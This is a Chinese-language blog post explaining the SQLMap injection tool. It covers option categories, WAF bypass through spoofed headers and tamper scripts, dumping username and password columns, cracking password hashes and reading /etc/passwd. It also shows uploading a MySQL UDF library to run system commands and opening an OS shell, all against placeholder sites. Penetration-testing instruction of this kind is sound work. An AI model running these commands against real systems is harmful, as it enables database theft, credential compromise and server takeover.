<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-3232cloud.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-1616cloud.png?v=5.1.4">


  <link rel="mask-icon" href="/images/cloud.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="web,渗透测试," />










<meta property="og:type" content="article">
<meta property="og:title" content="SQLMap">
<meta property="og:url" content="http://sunyyer.com/2021/01/19/SQLMap/index.html">
<meta property="og:site_name" content="云">
<meta property="og:locale">
<meta property="og:image" content="https://i.loli.net/2021/11/27/SFpxtqhleQR4zv6.png">
<meta property="article:published_time" content="2021-01-19T15:22:33.000Z">
<meta property="article:modified_time" content="2021-12-22T16:15:44.748Z">
<meta property="article:author" content="sunyyer">
<meta property="article:tag" content="web">
<meta property="article:tag" content="渗透测试">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2021/11/27/SFpxtqhleQR4zv6.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":true,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://sunyyer.com/2021/01/19/SQLMap/"/>





  <title>SQLMap | 云</title>
  








<meta name="generator" content="Hexo 5.4.0"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">云</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">雨声潺潺,像住在溪边,宁愿天天下雨,以为你是下雨不来</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://sunyyer.com/2021/01/19/SQLMap/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="云">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">SQLMap</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2021-01-19T23:22:33+08:00">
                2021-01-19
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E5%B7%A5%E5%85%B7/" itemprop="url" rel="index">
                    <span itemprop="name">工具</span>
                  </a>
                </span>

                
                
                  ， 
                
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E5%B7%A5%E5%85%B7/web%E5%AE%89%E5%85%A8/" itemprop="url" rel="index">
                    <span itemprop="name">web安全</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2021/01/19/SQLMap/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count valine-comment-count" data-xid="/2021/01/19/SQLMap/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i>
            <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p><img src="https://i.loli.net/2021/11/27/SFpxtqhleQR4zv6.png" alt="rain"></p>
<span id="more"></span>

<h1 id="SQLMap"><a href="#SQLMap" class="headerlink" title="SQLMap"></a>SQLMap</h1><h2 id="功能模块参数"><a href="#功能模块参数" class="headerlink" title="功能模块参数"></a>功能模块参数</h2><table>
<thead>
<tr>
<th align="center">Target:At least one of these options has to be provided to define the target(s)</th>
<th align="center">目标：至少为目标提供一个选项</th>
</tr>
</thead>
<tbody><tr>
<td align="center">Request</td>
<td align="center">请求：这些选项用于指定如何连接目标URL的方法</td>
</tr>
<tr>
<td align="center">Optimization</td>
<td align="center">优化：这些选项用来优化sqlmap的性能</td>
</tr>
<tr>
<td align="center">Injection</td>
<td align="center">注入：这些选项用于指定测试那些参数，提供注入payload和篡改脚本</td>
</tr>
<tr>
<td align="center">Detection</td>
<td align="center">侦测：这些选项用于侦测阶段的定制化</td>
</tr>
<tr>
<td align="center">Techniques</td>
<td align="center">技巧：这些选项用于调整特定sql注入技术的技巧</td>
</tr>
<tr>
<td align="center">Enumeration</td>
<td align="center">枚举：这些选项可用于枚举后端数据库管理系统信息、表里的数据接口，此外还可以运行你的sql语句</td>
</tr>
<tr>
<td align="center">Brute force</td>
<td align="center">暴力执行：这些选项用于暴力检查</td>
</tr>
<tr>
<td align="center">User-defined function injection</td>
<td align="center">用户定义注入函数:这些选项用于建立用户定义函数</td>
</tr>
<tr>
<td align="center">File system access</td>
<td align="center">访问文件系统：这些选项用于访问后端数据库管理系统的底层文件系统</td>
</tr>
<tr>
<td align="center">Operating system access</td>
<td align="center">操作系统连接：这些选项用于连接后端DBMS底层的os</td>
</tr>
<tr>
<td align="center">Windows registry access</td>
<td align="center">windows 注册表连接：这些选项用于连接后端DBMS的windows 注册表</td>
</tr>
<tr>
<td align="center">General</td>
<td align="center">通用：这些选项用于设置一些通用参数</td>
</tr>
</tbody></table>
<h2 id="经验总结"><a href="#经验总结" class="headerlink" title="经验总结"></a>经验总结</h2><ol>
<li><p>在使用-v参数的时候，尽量选择，3级别，次级别可以显示注入的参数。 例如：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -v3 -u www.example.com</span><br></pre></td></tr></table></figure></li>
<li><p>当一件知道数据库信息的时候，使用-d直接连接数据库，注意-D是指定目标库，要区分。<br>例如</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">：-d mysql://POTIAN : 123123 @127.0.0.1:3306/ ORDER</span><br></pre></td></tr></table></figure></li>
<li><p>当使用Burp或WebScarab保存了日志的时候，想从日志文件中筛选目标，可使用-I使用 绝对路径地址即可。 </p>
</li>
<li><pre><code> -g可以使用google的搜索结果，例如，直接搜索uid=，查找具有此参数的站点，直接使用sqlmap调用google结果，例：sqlmap  -g inurl:php?uid=。（收集了一些语句，在附表）当需要使用-g inurl:php?uid=等参数时，默认无法访问，可使用此参数+海外代理方式使用此功能。当代理需要验证的时候，使用-cre指定身份信息，需要使用代理轮巡时，使用文件加载代理设置列表，使用代理轮询也可在对访问ip次数进行了验证的场景使用。
</code></pre>
</li>
<li><p>服务端允许的情况下，–method改变默认的http方法，和其他参数配合使用，例如–data，改变为post然后推送数据。   </p>
</li>
<li><p>默认情况下sqlmap的HTTP请求头中User-Agent值是：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap/*.*-dev-xxxxxxx(http://sqlmap.org)</span><br></pre></td></tr></table></figure>
<p>&ensp;&ensp;&ensp;&ensp;可以使用–user-agent参数来指定想使用的UA，同时也可以使用–random-agent参数来随机的从./txt/user-agents.txt中获取。当–level参数设定为3或者3以上的时候，会尝试对User-Angent进行注入.另外UA是绕过waf的参数，–user-agent=                –random-agent这两个参数可对waf针对恶意ua的防控进行绕过。</p>
</li>
<li><p> 指定http请求中的header里的host参数、在请求中伪造referer，有些waf和安全产品等会对refer进行限制，仅允许本站referer，当waf参数对referer进行了限制后，可使用此参数进行绕过。当–level参数设定为3或者3以上的时候会尝试对referer注入指定其他的header信息，XFF等，例如strust2-045使用了Content-Type  </p>
</li>
<li><p>  HTTP代理身份验证凭据，可自动使用username：password和秘钥文件，例如有些访问会使用key文件，集团sso最爱出现此种场景，在这种身份验证凭据的需求中，也可使用-I参数使用burp等代理记录文件来使用身份凭据。</p>
</li>
<li><p>设置http请求间隔时间，在绕过需求时使用，例如单ip单位时间访问多少次，可配合代理和多代理参数使用。超时连接后的尝试间隔，默认30s，可手动调整，一般–timeout和–retries配合使用。</p>
</li>
<li><p>有的网站会对提交的参数进行编码或加密，这时候需要根据某个参数的变化，而修改另个一参数，才能形成正常的请求，这时可以用–eval参数在每次请求时根据所写python代码做完修改后请求。<br>例子：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">--eval=&quot;&quot;import hashlib;hash=hashlib.md5(id).hexdigest()&quot;&quot;</span><br></pre></td></tr></table></figure>
<p>&ensp;&ensp;&ensp;&ensp;上面的请求就是每次请求时根据id参数值，做一次md5后作为hash参数的值。</p>
</li>
<li><p> sqlmap默认测试所有的GET和POST参数，上文提到过，当–level的值大于等于2的时候也会测试HTTP Cookie头的值，大于等于3的时候也会测试User-Agent和HTTP Referer头的值。这时候可以手动指定-p参数设置想要测试的参数。 例如：-p “”id,cookie””但是有个别参数不想测试的时候可以使用<code>--skip=“user-agent”</code>参数。</p>
</li>
<li><p> 数值处理：参数：<code>--invalid-bignum</code> <code>--invalid-logical</code>这两个参数对报错数据、无效数据进行更改，例如默认报错UID=-20,可以通过制定以上参数制定无效的大数字和逻辑，比如<code>uid=999999999</code>和<code>uid=20 and a=b</code><br>参数：<code>--prefix,--suffix</code>在注入的payload的前面或者后面加一些字符，来保证payload的正常执行，例如在语句中增加</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">--prefix &quot;&quot;’)&quot;&quot; --suffix &quot;&quot;AND (’1’=’1&quot;&quot;</span><br></pre></td></tr></table></figure></li>
<li><p>   <code> --tamper</code>可从tamper库里查找相关内容，使用<code>--tamper tamper/*.py</code>方式指定。</p>
</li>
<li><pre><code>上文多次解释`--level`对测试参数的影响，一共有五个等级，默认为1，sqlmap使用的payload可以在payloads.xml中看到，你也可以根据相应的格式添加自己的payload内容，默认也有一些，可定制。
</code></pre>
</li>
</ol>
<p>–level的值大于等于2的时候也会测试HTTP Cookie头的值，大于等于3的时候也会测试User-Agent和HTTP Referer头的值，建议最高级别，会更慢、测试参数更复杂。<br>15.  risk从0-3共有四个风险等级，默认是1，risk1会测试大部分的测试语句，risk2会增加基于事件的测试语句，3会增加OR语句的注入测试。测试的语句同样可以在payloads.xml中找到，可以自行添加payload。<br>警告：当使用高级别时，可能会使用drop、update等高危语句对整表、整库造成影响，可能导致更新的整个表，可能造成很大的风险。<br>16. sqlmap测试结果取决于返回内容，当页面在刷新或更新后，可能导致返回不同的内容，特别是页面有动态内容的情况下。为了避免误报，可指定字符串或者正则表达式来区分原始页面和报错页面（<code>--string</code>参数添加字符串，<code>--regexp</code>添加正则），也可以提供一段字符串在原始页面与true下的页面都不存在的字符串，而false页面中存在的字符串（<code>--not-string</code>添加）。<br>用户也可以提供true与false返回的HTTP状态码不一样来注入，例如，响应200的时候为真，响应401的时候为假，<code>--code=200</code>。<br>17.     默认sqlmap会把BEUSTQ六中注入方式全来一遍，可根据实际情况进行调整，例如可使用时间延迟，看网站响应时间来判断是否有注入，可根据报错判断注入。如果不是很懂，就不用管，虽然时间长点，但很全面。 </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">B:Boolean-based blind SQL injection（布尔型注入）</span><br><span class="line">E:Error-based SQL injection（报错型注入） </span><br><span class="line">U:UNION query SQL injection（可联合查询注入） </span><br><span class="line">S:Stacked queries SQL                injection（可多语句查询注入） </span><br><span class="line">T: Time-based blind SQL injection（基于时间延迟注入） </span><br><span class="line">Q: Inline SQL Injection  (内联注入)</span><br></pre></td></tr></table></figure>

<p>当使用基于时间延迟注入的盲注时，时刻使用<code>--time-sec</code>参数设定延时时间，默认是5秒，可以根据环境记性调整，比如网络延迟很大，可适当增加延时时间。<br>18.    <code>--union-cols</code>设定的值为一段整数范围，制定区间，此数值默认为1-10，随着<code>--levle</code>增加，当为5的时候增加为50，当level级别和取值范围不匹配，在低级别需求更大的范围，可通过设定<code>--union-cols</code>的值来实现。设定union查询使用的字符，默认使用NULL，但是可能会返回失败，<code>--union-char</code>指定UNION查询的字符。指定查询的表，配合上文暴力破解的字符、范围等来详细使用。<br>19. 在一旦注入成功且获得精确信息通过以下详细参数来指定检索、枚举动作和动作执行对象：检索DBMS的指纹特征、数据库、host值、用户身份、并对用户、密码、权限、角色进行枚举也就是爆破。然后尝试枚举数据库、数据库里的表、数据库里的内容、可以使用count来统计条目等操作。dump和dump-all就是脱裤和全脱的区别，dump某表的十条八条可能没事儿，<code>dump-all</code>注定要浪迹天涯，也就是所谓的从脱裤到跑路的开始，通过-D-T-C来制定索要枚举的库、表、和列，使用-X来排除不想要的列，特别是有多列且有无意义字段的时候，使用-X可大大节省时间。                <code>--exclude-sysdbs</code>参数，将不会获取数据库自带的系统库内容，可减少干扰内容，对<code>-count</code>的使用和枚举信息的使用建议搭配此参数来排除系统库。<br>当我们不想跑路的时候，那么请使用下面内容：     </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">--start=LIMITSTART  First query output entry to retrieve指定从第几行开始输出，如：</span><br><span class="line">--start=1                    </span><br><span class="line">--stop=LIMITSTOP    </span><br><span class="line">Last query output entry to retrieve</span><br><span class="line">指定从第几行停止输出</span><br><span class="line">--stop=10 </span><br><span class="line">--first=FIRSTCHAR   </span><br><span class="line">First query output word character                to retrieve</span><br><span class="line">指定从第几个字符开始输出</span><br><span class="line">--first 1     </span><br><span class="line">--last=LASTCHAR</span><br><span class="line">Last query output word character to retrieve</span><br><span class="line">指定从第几个字符停止输出--last10</span><br></pre></td></tr></table></figure>
<p>20.暴力检查：猜测检查常见的、通用的表名和列名，可通过下面两个文件进行定制化，暴力破解的表在<code>txt/common-tables.txt</code>文件中，暴力破解的列名<code>在txt/common-columns.txt</code>中。<br>21. </p>
<p>–batch在使用sqlmap时，有时一些响应需要用户交互，输入Y、N、skip、quit等，使用此选项可使用默认配置。 </p>
<p>–output-dir=  指定输出路径，方式控制台输出过多，无法查看，也方便记录 </p>
<p>–gpage=GOOGLEPAGE<br>好像默认是使用google搜索的前100个文件，当使用前面的-g参数，配合此参数指定页面 </p>
<p>–identify-waf  进行WAF/IPS/IDS保护测试，目前大约支持30种产品的识别 </p>
<p>–mobile 使用移动产品UA，把sqlmap伪装成手机，也可使用前面的</p>
<p>-user-agent<br>自己指定 </p>
<p>–smart<br>智能深度启发式扫描，或许会有惊喜呢。<br> –wizard 和上面的完全不同，纯新手选择，一步步让你输入url等参数，基本输入个url就行。</p>
<h2 id="实操"><a href="#实操" class="headerlink" title="实操"></a>实操</h2><ol>
<li>手工基本检测和判断（在注入点使用or、and等可判断是否有注入点）  </li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">原始网页：http://www.potian.com/mysql/product/user_info.php?uid=1 024</span><br><span class="line">构造url1：http://www.potian.com/mysql/product/user_info.php?uid=1 024+AND+1=1</span><br><span class="line">构造url2：http://www.potian.com/mysql/product/user_info.php?uid=1 024+AND+1=1 025</span><br></pre></td></tr></table></figure>
<ol start="2">
<li><pre><code> 基础检测语法  
</code></pre>
批量检测     <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">“sqlmap.py -m target.txt”，注意target.txt跟sqlmap在同一个目录下。</span><br></pre></td></tr></table></figure></li>
<li> 绕过WAF进行SQL注入(具体参见另一文章)</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">修改\sqlmap\tamper\halfversionedmorekeywords.py return match.group().replace(word, ”/*!0%s” % word) 为：return match.group().replace(word, ”/*!50000%s*/” % word) </span><br><span class="line">修改\sqlmap\xml\queries.xml &lt;cast query= ”CAST(%s ASCHAR)”/&gt;为：&lt;castquery=                ”convert(%s,CHAR)”/&gt; </span><br><span class="line">使用sqlmap进行注入测试sqlmap.py -u ”http://www.potian.com/detail.php? id=16″ –tamper “halfversionedmorekeywords.py”</span><br><span class="line"></span><br><span class="line">其它绕过waf脚本方法：sqlmap.py-u “ http://www.potian.com/mysql/product/user_info.php?uid=1 024”                –tampertamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3 </span><br></pre></td></tr></table></figure>
<ul>
<li><p>tamper目录下文件具体含义（脚本过多参考链接）：</p>
<p>  <a target="_blank" rel="noopener" href="https://www.freebuf.com/sectool/179035.html">1.2.7.20temper脚本</a></p>
</li>
</ul>
<ol start="5">
<li><p>URL重写SQL注入测试</p>
<p> value1为测试参数，加“*”即可，sqlmap将会测试value1的位置是否可注入。 </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u ” http://www.potian.com/param1/value1 */param2/value2/”</span><br></pre></td></tr></table></figure></li>
<li><p>列举并破解密码哈希值              </p>
<p> 当前用户有权限读取包含用户密码的权限时，sqlmap会现列举出用户，然后列出hash，并尝试破解。 </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u ” http://www.potian.com/sqlmap/pgsql/get_int.php?id=1 ” –passwords -v1</span><br></pre></td></tr></table></figure>
</li>
<li><p>获取表中的数据个数       </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u ” http://www.potian.com/sqlmap/mssql/iis/get_int.asp?id=1 ” –count -Dtestdb</span><br></pre></td></tr></table></figure>
</li>
<li><p> 站点爬取     </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u “ http://www.secbang.com “–batch –crawl=3</span><br></pre></td></tr></table></figure></li>
<li><p>注入时间预估（基于布尔） </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u “ http://www.secbang.com/sqlmap/oracle/get_int_bool.php?id=1 “-b –eta</span><br></pre></td></tr></table></figure></li>
<li><p>使用hex避免字符编码导致数据丢失        </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u “ http://www.secbang.com/pgsql/get_int.php?id=1 ” –banner –hex -v 3 –parse-errors</span><br></pre></td></tr></table></figure></li>
<li><p>模拟测试手机环境站点        </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python sqlmap.py -u ” http://www.secbang.com/vuln.php?id=1 ” –mobile</span><br></pre></td></tr></table></figure></li>
<li><p>智能判断测试        </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u “ http://www.secbang.com/info.php?id=1 “–batch –smart</span><br></pre></td></tr></table></figure></li>
<li><p> 结合burpsuite进行注入      </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -r burpsuite 抓包.txt</span><br></pre></td></tr></table></figure></li>
<li><p>sqlmap 自动填写表单注入     </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u URL –forms </span><br><span class="line">sqlmap.py -u URL –forms –dbs </span><br><span class="line">sqlmap.py -u URL –forms –current-db sqlmap.py -u URL –forms -D 数据库名称–tables </span><br><span class="line">sqlmap.py -u URL –forms -D 数据库名称 -T 表名 –columns </span><br><span class="line">sqlmap.py -u URL –forms -D 数据库名称 -T 表名 -Cusername，password –dump</span><br></pre></td></tr></table></figure></li>
<li><p>读取linux下文件     </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py-u “url” –file /etc/password</span><br></pre></td></tr></table></figure></li>
<li><p>sqlmap cookies 注入      </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u “ http://www.potian.com/mysql/product/user_info.php?uid=1 024“–cookies “ssuid=*″  –dbs –level 3 sqlmap.py -u 注入点URL --cookie&quot;id=xx&quot; --level 3 </span><br><span class="line">sqlmap.py -u url --cookie &quot;id=xx&quot;--level 3 --tables( 猜表名) </span><br><span class="line">sqlmap.py -u url --cookie &quot;id=xx&quot;--level 3 -T 表名 --coiumns </span><br><span class="line">sqlmap.py -u url --cookie &quot;id=xx&quot;--level 3 -T 表名 -C username，password --dump</span><br></pre></td></tr></table></figure></li>
<li><p>连接mysql数据打开一个交互shell      </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -dmysql://potian:123123@www.potian.com:3306/sqlmap --sql-shell select @@version; select @@plugin_dir;</span><br></pre></td></tr></table></figure></li>
<li><p>利用sqlmap上传<code>lib_mysqludf_sys</code>到MySQL插件目录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -dmysql://potian:123123@www.potian.com:3306/sqlmap --file-write=d:/tmp/lib_mysqludf_sys.dll--file-dest=d:\\wamp2.5\\bin\\mysql\\mysql5.6.17\\lib\\plugin\\lib_mysqludf_sys.dll CREATE FUNCTION sys_exec RETURNS STRINGSONAME &#x27;lib_mysqludf_sys.dll&#x27; CREATE FUNCTION sys_eval RETURNS STRINGSONAME &#x27;lib_mysqludf_sys.dll&#x27; select sys_eval(&#x27;ver&#x27;);</span><br></pre></td></tr></table></figure></li>
<li><p>执行shell命令      </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u “url” –os-cmd=”netuser” /*执行net user命令*/ sqlmap.py -u “url” –os-shell /*系统交互的shell*/</span><br></pre></td></tr></table></figure></li>
<li><p>延时注入     </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap –dbs -u&quot;url&quot; –delay 0.5 /* 延时0.5秒*/ sqlmap –dbs -u&quot;url&quot; –safe-freq /* 请求2次*/</span><br></pre></td></tr></table></figure></li>
</ol>

      
    </div>
    
    
    

    

    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者：</strong>
    sunyyer
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="http://sunyyer.com/2021/01/19/SQLMap/" title="SQLMap">http://sunyyer.com/2021/01/19/SQLMap/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>
    本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
  </li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/web/" rel="tag"># web</a>
          
            <a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" rel="tag"># 渗透测试</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2021/01/08/Inotifywait/" rel="next" title="Inotifywait">
                <i class="fa fa-chevron-left"></i> Inotifywait
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2021/05/03/%E4%BA%BA%E7%94%9F%E7%9A%84%E6%84%8F%E4%B9%89%E5%88%B0%E5%BA%95%E6%98%AF%E4%BB%80%E4%B9%88%E5%91%A2/" rel="prev" title="人生的意义到底是什么呢">
                人生的意义到底是什么呢 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
    </div>
  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name"></p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/%7C%7C%20archive">
              
                  <span class="site-state-item-count">20</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">13</span>
